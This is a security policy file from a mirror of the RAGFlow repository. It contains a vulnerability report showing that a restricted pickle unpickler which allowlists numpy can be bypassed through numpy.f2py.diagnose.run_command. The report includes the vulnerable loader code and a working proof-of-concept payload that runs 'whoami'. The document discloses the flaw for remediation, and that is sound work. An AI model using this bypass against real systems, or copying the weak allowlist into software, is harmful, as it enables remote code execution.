mirror of
https://git.mirrors.martin98.com/https://github.com/infiniflow/ragflow.git
synced 2025-04-10 16:00:27 +08:00
6b23308f26
Added kibana to make elastic management easier. PR #1710 did this. PR #1714 revert this. This PR did again and fix some bugs. - [x] Bug Fix (non-breaking change which fixes an issue) - [x] New Feature (non-breaking change which adds functionality)
1.9 KiB
1.9 KiB
Security Policy
Supported Versions
Use this section to tell people about which versions of your project are currently being supported with security updates.
| Version | Supported |
|---|---|
| <=0.7.0 | ✅ |
Reporting a Vulnerability
Branch name
main
Actual behavior
The restricted_loads function at api/utils/init.py#L215 is still vulnerable leading via code execution. The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
Steps to reproduce
ragflow_patch.py
import builtins
import io
import pickle
safe_module = {
'numpy',
'rag_flow'
}
class RestrictedUnpickler(pickle.Unpickler):
def find_class(self, module, name):
import importlib
if module.split('.')[0] in safe_module:
_module = importlib.import_module(module)
return getattr(_module, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))
def restricted_loads(src):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(src)).load()
Then, PoC.py
import pickle
from ragflow_patch import restricted_loads
class Exploit:
def __reduce__(self):
import numpy.f2py.diagnose
return numpy.f2py.diagnose.run_command, ('whoami', )
Payload=pickle.dumps(Exploit())
restricted_loads(Payload)
Result
Additional information
How to prevent?
Strictly filter the module and name before calling with getattr function.